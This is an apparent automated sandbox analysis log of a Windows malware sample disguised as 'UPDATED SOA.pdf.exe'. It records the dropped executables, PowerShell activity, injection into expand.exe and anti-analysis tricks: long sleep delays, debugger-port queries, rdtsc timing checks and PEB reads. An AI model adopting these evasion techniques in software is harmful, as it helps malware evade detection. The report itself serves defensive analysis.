                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\expand.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\expand.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\expand.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\expand.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\expand.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\expand.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\expand.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\expand.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\expand.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\expand.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\expand.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\expand.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\expand.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeMemory allocated: AF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeMemory allocated: 24B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeMemory allocated: 44B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeMemory allocated: 7430000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeMemory allocated: 8430000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeMemory allocated: 85E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeMemory allocated: 95E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeMemory allocated: 9940000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeMemory allocated: A940000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeMemory allocated: B940000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeMemory allocated: 15B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeMemory allocated: 3190000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeMemory allocated: 2EB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeMemory allocated: 7C30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeMemory allocated: 8C30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeMemory allocated: 8DD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeMemory allocated: 9DD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeMemory allocated: A4A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeMemory allocated: B4A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0150096E rdtsc 9_2_0150096E
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5875Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3954Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7389Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2361Jump to behavior
                Source: C:\Windows\SysWOW64\expand.exeWindow / User API: threadDelayed 9808
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeAPI coverage: 0.8 %
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeAPI coverage: 0.3 %
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exe TID: 7164Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2992Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6356Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exe TID: 6752Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\expand.exe TID: 4592Thread sleep count: 164 > 30
                Source: C:\Windows\SysWOW64\expand.exe TID: 4592Thread sleep time: -328000s >= -30000s
                Source: C:\Windows\SysWOW64\expand.exe TID: 4592Thread sleep count: 9808 > 30
                Source: C:\Windows\SysWOW64\expand.exe TID: 4592Thread sleep time: -19616000s >= -30000s
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exe TID: 1668Thread sleep time: -80000s >= -30000s
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exe TID: 1668Thread sleep count: 37 > 30
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exe TID: 1668Thread sleep time: -55500s >= -30000s
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exe TID: 1668Thread sleep count: 42 > 30
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exe TID: 1668Thread sleep time: -42000s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\expand.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\expand.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULLJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbxJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\NULLJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeFile opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULLJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\AdobeJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\AcrobatJump to behavior
                Source: expand.exe, 00000012.00000002.4142996530.0000000000963000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>$
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1797902753.0000000003D0E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SlVMCIOQT2
                Source: firefox.exe, 00000014.00000002.2336097263.00000125AFB5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllllU
                Source: S1OoUcW6nwo.exe, 00000013.00000002.4143250685.0000000001339000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllb
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess queried: DebugPort
                Source: C:\Windows\SysWOW64\expand.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0150096E rdtsc 9_2_0150096E
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 0_2_0068D4C4 LdrInitializeThunk,0_2_0068D4C4
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01558158 mov eax, dword ptr fs:[00000030h]9_2_01558158
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01554144 mov eax, dword ptr fs:[00000030h]9_2_01554144
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01554144 mov eax, dword ptr fs:[00000030h]9_2_01554144
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01554144 mov ecx, dword ptr fs:[00000030h]9_2_01554144
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01554144 mov eax, dword ptr fs:[00000030h]9_2_01554144
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01554144 mov eax, dword ptr fs:[00000030h]9_2_01554144
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C6154 mov eax, dword ptr fs:[00000030h]9_2_014C6154
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C6154 mov eax, dword ptr fs:[00000030h]9_2_014C6154
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014BC156 mov eax, dword ptr fs:[00000030h]9_2_014BC156
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01580115 mov eax, dword ptr fs:[00000030h]9_2_01580115
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0156A118 mov ecx, dword ptr fs:[00000030h]9_2_0156A118
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0156A118 mov eax, dword ptr fs:[00000030h]9_2_0156A118
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0156A118 mov eax, dword ptr fs:[00000030h]9_2_0156A118
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0156A118 mov eax, dword ptr fs:[00000030h]9_2_0156A118
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0156E10E mov eax, dword ptr fs:[00000030h]9_2_0156E10E
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0156E10E mov ecx, dword ptr fs:[00000030h]9_2_0156E10E
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0156E10E mov eax, dword ptr fs:[00000030h]9_2_0156E10E
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0156E10E mov eax, dword ptr fs:[00000030h]9_2_0156E10E
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0156E10E mov ecx, dword ptr fs:[00000030h]9_2_0156E10E
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0156E10E mov eax, dword ptr fs:[00000030h]9_2_0156E10E
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0156E10E mov eax, dword ptr fs:[00000030h]9_2_0156E10E
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0156E10E mov ecx, dword ptr fs:[00000030h]9_2_0156E10E
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0156E10E mov eax, dword ptr fs:[00000030h]9_2_0156E10E
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0156E10E mov ecx, dword ptr fs:[00000030h]9_2_0156E10E
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014F0124 mov eax, dword ptr fs:[00000030h]9_2_014F0124
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0153E1D0 mov eax, dword ptr fs:[00000030h]9_2_0153E1D0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0153E1D0 mov eax, dword ptr fs:[00000030h]9_2_0153E1D0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0153E1D0 mov ecx, dword ptr fs:[00000030h]9_2_0153E1D0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0153E1D0 mov eax, dword ptr fs:[00000030h]9_2_0153E1D0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0153E1D0 mov eax, dword ptr fs:[00000030h]9_2_0153E1D0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015861C3 mov eax, dword ptr fs:[00000030h]9_2_015861C3
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015861C3 mov eax, dword ptr fs:[00000030h]9_2_015861C3
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014F01F8 mov eax, dword ptr fs:[00000030h]9_2_014F01F8
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015961E5 mov eax, dword ptr fs:[00000030h]9_2_015961E5
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0154019F mov eax, dword ptr fs:[00000030h]9_2_0154019F
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0154019F mov eax, dword ptr fs:[00000030h]9_2_0154019F
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0154019F mov eax, dword ptr fs:[00000030h]9_2_0154019F
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0154019F mov eax, dword ptr fs:[00000030h]9_2_0154019F
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01500185 mov eax, dword ptr fs:[00000030h]9_2_01500185
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01564180 mov eax, dword ptr fs:[00000030h]9_2_01564180
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01564180 mov eax, dword ptr fs:[00000030h]9_2_01564180
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014BA197 mov eax, dword ptr fs:[00000030h]9_2_014BA197
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014BA197 mov eax, dword ptr fs:[00000030h]9_2_014BA197
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014BA197 mov eax, dword ptr fs:[00000030h]9_2_014BA197
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0157C188 mov eax, dword ptr fs:[00000030h]9_2_0157C188
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0157C188 mov eax, dword ptr fs:[00000030h]9_2_0157C188
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01546050 mov eax, dword ptr fs:[00000030h]9_2_01546050
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C2050 mov eax, dword ptr fs:[00000030h]9_2_014C2050
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014EC073 mov eax, dword ptr fs:[00000030h]9_2_014EC073
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01544000 mov ecx, dword ptr fs:[00000030h]9_2_01544000
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01562000 mov eax, dword ptr fs:[00000030h]9_2_01562000
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01562000 mov eax, dword ptr fs:[00000030h]9_2_01562000
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01562000 mov eax, dword ptr fs:[00000030h]9_2_01562000
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01562000 mov eax, dword ptr fs:[00000030h]9_2_01562000
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01562000 mov eax, dword ptr fs:[00000030h]9_2_01562000
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01562000 mov eax, dword ptr fs:[00000030h]9_2_01562000
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01562000 mov eax, dword ptr fs:[00000030h]9_2_01562000
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01562000 mov eax, dword ptr fs:[00000030h]9_2_01562000
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014DE016 mov eax, dword ptr fs:[00000030h]9_2_014DE016
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014DE016 mov eax, dword ptr fs:[00000030h]9_2_014DE016
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014DE016 mov eax, dword ptr fs:[00000030h]9_2_014DE016
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014DE016 mov eax, dword ptr fs:[00000030h]9_2_014DE016
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01556030 mov eax, dword ptr fs:[00000030h]9_2_01556030
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014BA020 mov eax, dword ptr fs:[00000030h]9_2_014BA020
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014BC020 mov eax, dword ptr fs:[00000030h]9_2_014BC020
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015420DE mov eax, dword ptr fs:[00000030h]9_2_015420DE
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015020F0 mov ecx, dword ptr fs:[00000030h]9_2_015020F0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C80E9 mov eax, dword ptr fs:[00000030h]9_2_014C80E9
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014BA0E3 mov ecx, dword ptr fs:[00000030h]9_2_014BA0E3
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015460E0 mov eax, dword ptr fs:[00000030h]9_2_015460E0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014BC0F0 mov eax, dword ptr fs:[00000030h]9_2_014BC0F0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C208A mov eax, dword ptr fs:[00000030h]9_2_014C208A
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015860B8 mov eax, dword ptr fs:[00000030h]9_2_015860B8
